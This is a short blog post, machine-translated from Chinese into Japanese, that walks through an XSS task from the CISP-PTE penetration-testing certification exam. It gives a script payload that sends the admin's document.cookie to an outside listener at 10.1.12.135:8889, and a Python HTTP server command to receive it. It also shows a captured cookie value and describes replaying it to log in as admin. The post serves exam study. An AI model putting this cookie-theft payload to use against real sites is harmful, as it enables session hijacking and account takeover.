cisp-pte xss問題

2023年7月20日#渗透测试 #考证243

AI 翻訳

この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示

AI が生成した要約

XSS内容的重点是获取管理员的cookie，然后伪造管理员的cookie进行登录。界面上有Test按钮可进行留言，准备获取cookie的XSS payload，开启web服务接收cookie，将payload写入输入框，点击提交查询，查看Python是否接收到cookie，复制cookie值，替换掉原来的cookie值，点击Edit进行替换，刷新界面，点击Admin成功登录并获取到key。

Xss コンテンツの主な焦点は、管理者のクッキーを取得し、その後、偽の管理者のクッキーを使用してログインすることです。

以下はインターフェースです

上記の画像の Test をクリックしてメッセージを残すことができます

クッキーを取得するための XSS ペイロードを準備します

<script>
document.write('<img src="http://10.1.12.135:8889?'+ escape(document.cookie) + '">')
</script>

Web サーバーを起動し、クッキーを受け取ります

Python -m SimpleHTTPServer 8889

ペイロードを入力ボックスに書き込みます

クエリを送信するために送信ボタンをクリックします

待つ

Python がクッキーを受け取ったかどうかを確認します

クッキーをコピーします

1acb0fb952b3caaf1ab7277511923138

クッキーの値を置き換えます

置換するために Edit をクリックします

ページをリフレッシュし、Admin をクリックします

ログインに成功し、キーを取得します

wps10